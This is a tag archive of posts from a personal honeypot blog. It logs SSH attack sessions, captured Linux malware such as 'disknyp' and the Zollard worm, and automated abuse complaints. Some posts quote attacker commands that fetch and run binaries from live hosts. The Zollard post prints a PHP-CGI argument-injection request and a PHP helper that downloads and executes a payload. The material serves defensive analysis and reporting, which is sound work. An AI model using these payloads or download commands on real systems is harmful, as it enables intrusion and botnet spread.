Posts Tagged ‘Honeypots’

« Older Entries

Honeypot detection

Wednesday, April 26th, 2017

My honeypots are sending out complaints on every single successful login.

Recently I saw the following logged entry in the complaint:

echo -en “\\x31\\x33\\x33\\x37”
cat /bin/ls

Now neither kippo nor cowrie as sshd-honeypots have the file “/bin/ls” which could be looked at,  so a  ‘cat /bin/ls’ just result in a :

‘cat: /bin/ls: No such file or directory’

So this seems to be an easy and reliable way to test for a standard sshd-honeypot..
No wonder that \\x31\\x33\\x33\\x37 just translates to “1337”, which I interpret as a smiley left by the hacker ..

Tags: , , , , , ,
Posted in Honeypots | No Comments »

MinCoin

Friday, January 10th, 2014

I am not up to date..

Looking at http://p2pool.org/ I see not only BitCoin storage, but also  FeatherCoin, LiteCoin, MemeCoin, Terra; FreiCoin, LottoCoin and other stuff..

Whew.. I did not think that there are so many crypto currencies out there.

I found this because my honeypot captured a link to

http://110.154.103.80:58455/x86 ( e66eb75f05328783c23745ef9d573de1 )

(I mentioned this program earlier (x86), but with a different md5-hash..)

Looking at the “x86” program one can find the installation of a miner for “MinCoins”, storing them at p2pool.org.

I am wondering why not even one of the virustotal-engines thinks, that this is malware..

 

Tags: , ,
Posted in Honeypots | 2 Comments »

disknyp 3

Monday, December 16th, 2013

disknyp doesn’t seem to be a new thing..

In the paper:

 

141
PATTERNS AND PATTER  AN INVESTIGATION INTO  SSH ACTIVITY USINGKIPPO HONEYPOTS
CraigValli,PriyaRabadiaandAndrewWoodward
EdithCowanUniversity,Security
ResearchInstitute
Perth,Australia

c.valli@ecu.edu.au,prabadia@our.ecu.edu.au,a.woodward@ecu.edu.a

 

(to be found at http://ro.ecu.edu.au/cgi/viewcontent.cgi?article=1126&context=adf ) the download URL is already mentioned. Also clean-mx knows the file host; and on http://honey1.christiaan008.tk:8080/kippo-graph/kippo-input.php there is also a good look at these activities.

Tags:
Posted in Honeypots | 2 Comments »

disknyp 2

Monday, December 16th, 2013

Meanwhile I captured  268 samples of disknyp.

Can be found on: http://198.2.192.204:22/disknyp

cool .. webserver on the ssh-port 🙂

The server answers with:

Content-Type: text/html
Content-Length: 4440
Accept-Ranges: bytes
Server: HFS 2.3 beta
Cache-Control: no-cache, no-store, must-revalidate, max-age=-1

Looks like the webserver running is from:

http://ha-hfs.googlecode.com/files/hfs2.3 beta271.exe

Also available for download on this webserver is a

svch.exe , probably infected for window-machines.

Virustotal says, only 24 from 48 antivir-vendors discover this

trojan.

MD5 9d37ef3a5388b1d3d67a8759f178dd2d
SHA1 c09437f9d2752fc8ded68429ac33392c846370fc
SHA256 5c7d2aa53e55977b1bd677d6a3415c7e9900769fc49e9e3bed1fd42d73f0381b

 

 

Tags:
Posted in Honeypots | No Comments »

disknyp

Monday, December 2nd, 2013

Yesterday my ssh-honeypot captured 54 samples of “disknyp”.

All logins (probably automated) did the following:

**:~# rm -f disknyp
**:~# rm -f disknop
**:~# wget http://198.2.192.204:22/disknyp
–2013-12-01 03:58:03–  http://198.2.192.204:22/disknyp
Connecting to 198.2.192.204:22… connected.
HTTP request sent, awaiting response… 503 ?????????
**:~# chmod 0777 disknyp
**:~# nohup /root/disknyp > /dev/null 2>&1 &
bash: nohup: command not found
**x:>

The file is a 1491887 Bytes  ELF 32-bit LSB executable. I don’t know yet what it is doing..

Tags:
Posted in Honeypots | 2 Comments »

linux binary

Tuesday, November 12th, 2013

Recently my nepenthes stopped working. Looking into the last log – lines I found a wget – line:

[12112013 06:25:07 debug info fixme] File info submitted (ebee4228eb3443cd
8d55228733b8c1c6, http://www.gpharma.co/x86)

So I took a a look at this binary which I could download from this location.

# file x86
x86: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped

Next look: try “strings”:

first nothing new.. but then I saw:

/proc/self/exe
POST
?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%6
4+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%
73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%
75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%
72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%
65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%
5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%
74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
<?php
$disablefunc = @ini_get(“disable_functions”);
if (!empty($disablefunc))
$disablefunc = str_replace(” “,””,$disablefunc);
$disablefunc = explode(“,”,$disablefunc);

What the heck..? And who is “zollard”?

 

#### Update  ####

The POST Part resolves to:

?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions=”” -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n

###############

 

further on:

function myshellexec($cmd)
global $disablefunc;
$result = “”;
if (!empty($cmd))
if (is_callable(“exec”) and !in_array(“exec”,$disablefunc)) {exec($cmd,$
result); $result = join(“n”,$result);}
elseif (($result = `$cmd`) !== FALSE) {}
elseif (is_callable(“system”) and !in_array(“system”,$disablefunc)) {$v
= @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_content
s(); @ob_clean(); echo $v;}
elseif (is_callable(“passthru”) and !in_array(“passthru”,$disablefunc))
{$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_c
ontents(); @ob_clean(); echo $v;}
elseif (is_resource($fp = popen($cmd,”r”)))
$result = “”;
while(!feof($fp)) {$result .= fread($fp,1024);} pclose($fp);
return $result;
myshellexec(“wget -O /tmp/x86 http://www.solarteure-landkirchen.de/solar/x
86”);
myshellexec(“chmod +x /tmp/x86”);
myshellexec(“/tmp/x86”);

Now the binary loads another binary, executes it and starts a webserver?

myshellexec(“wget -O /tmp/x86 http://www.solarteure-landkirchen.de/solar/x
86”);
myshellexec(“chmod +x /tmp/x86”);
myshellexec(“/tmp/x86”);
HTTP/1.1 200 OK
httpd

A few lines more: It installes “iptables”, droppes every telnet connection ands starts

its own telnet-daemon:

insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp –dport 23 -j DROP
iptables -A INPUT -p tcp –dport 23 -j DROP
telnetd

In the end the program destroys its sources (rm -rf)  and runs in

mkdir -p
/var/run/.zollard/

The last lines:

chmod +x
cp /bin/sh
1234
12345
dreambox
smcadmin
stemroot
0!0
SHA1

So it ends up with some kind of crypto..

Virustotal shows a hitrate of 2 out of 47,  well, it is no windows binary..

Anyone seen this before? Who is zollard? Where did the binary got the necessary root-credentials

from?  I guess I have to take a further look..

 

###

Update

There were quite a lot of download-trials today:

# grep gpharma nepenthes.log | wc -l
33348

which is from the log-lines:

[12112013 09:23:43 debug info fixme] File info submitted (ebee4228eb3443cd8d55228733b8c1c6, http://www.gpharma.co/x86)
[12112013 09:23:43 debug info fixme] File upload requested (ebee4228eb3443cd8d55228733b8c1c6, http://www.gpharma.co/x86)

 

#### Update 2 ###

 

I executed the script on a linux vmware after adding “o+x” rights to the binary.

The iptables lines generate errors:

error inserting … ip_tables.ko – Unknown symbol in module

 

Immediatly the machine starts exchanging traffic with 117.201.16.108 : 58455

ans starts also listening on this port 58455

Looks like my machine started scanning the ip-range 117.201.16.* on that port –

I receive answers from there…  No httpd oder telnetd daemons are listening in “ps”, which I expected.

The command “pstree” shows a httpd, though! Different childrens  are running, the last one has a connection

to 117.201.18.22..23..24.. Looks like the “ps”executable has been changed.

Will see, what else can be found. Now it is “St. Martin” – time..:-)

 

 

 

 

 

 

 

 

 

Tags: ,
Posted in Honeypots | 2 Comments »

good website

Thursday, September 27th, 2012

Found an interesting website dealing with malware-analysis:

http://websiteanalystsresource.wordpress.com/

Seems like a good source for information.

Tags: , ,
Posted in Allgemein | No Comments »

Tor exit node used for attack

Wednesday, March 21st, 2012

One recent reply to a kippo-attack complaint explained that the attacking ip is a TOR exit node.

Of course there is no way for us to find the real attacker when he/she is using TOR

for making this attack. Sad that this important service is abused in this way.

The system you have identified (cs-tor.bu.edu / 204.8.156.142) is an exit node on the Tor network. Tor is a distributed cryptographic anonymizing proxy service. The network traffic you detected was merely relayed through this system, and did not originate there. It is not possible to trace these connections back to their original source.

Tags:
Posted in Allgemein | No Comments »

sshd complaints – update

Wednesday, March 14th, 2012

The automatic complaint-mechanism is now active. A X-ARF complaint is generated
for each session where a successful login into the kippo-honeypot produced some
recorded commands. The email address where the complaint is sent to is generated
like always – check own database, check ripe-website and check abusix.
Here is an example of the second mime-part:

MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset="utf8"; name="report.yaml"


Reported-From: spamtrap@netcologne.de
Category: abuse
Report-Type: login-attack
Destination-System: kippo – sshd honeypot
User-Agent: PHREAK 1.3
Report-ID: 2faf4f486d7f11e18949797f346be17f@netcologne.de
Date: 2012-03-14 03:45:28
Service: sshd
Port: 22
Source: 89.129.**.** (obfuscated)
Source-Type: ipv4
Attachment: text/plain
Schema-URL: http://www.x-arf.org/schema/abuse_login-attack_0.1.2.json
Version: 1.0.1

and the third MIME-part looks like this:


MIME-Version: 1.0
Content-Transfer-Encoding: 7bit
Content-Type: text/plain; charset="utf8"; name="command.txt"

recorded commands during this session:

w
uname -a
wget http://root-arhive.at.ua/flood/udp.tgz
tar zxvf udp.tgz
rm -rf udp.tgz
chmod +x *
–===============0648269240==–

Tags:
Posted in Allgemein | No Comments »

sshd-complaints

Friday, March 9th, 2012

I am pretty close to start sending out complaints
for successful sshd – logins on my kippo honeypot.
The X-ARF part is ready. I decided to add the recorded
commands in the 3rd MIME-part. The ttylog could also
be useful, but the receiver of the complaint is probably
not so interested in starting the playlog utility for
each complaint.
I still need to implement a database check so that receivers
only get a handful complaints and are not overwhelmed by the
number of complaints..
Additionally the catched ips will be added in our blacklist,
just like in the attacks cachted by nepenthes.
Dionaea-attacks will come next 🙂

Tags:
Posted in Allgemein | No Comments »

« Older Entries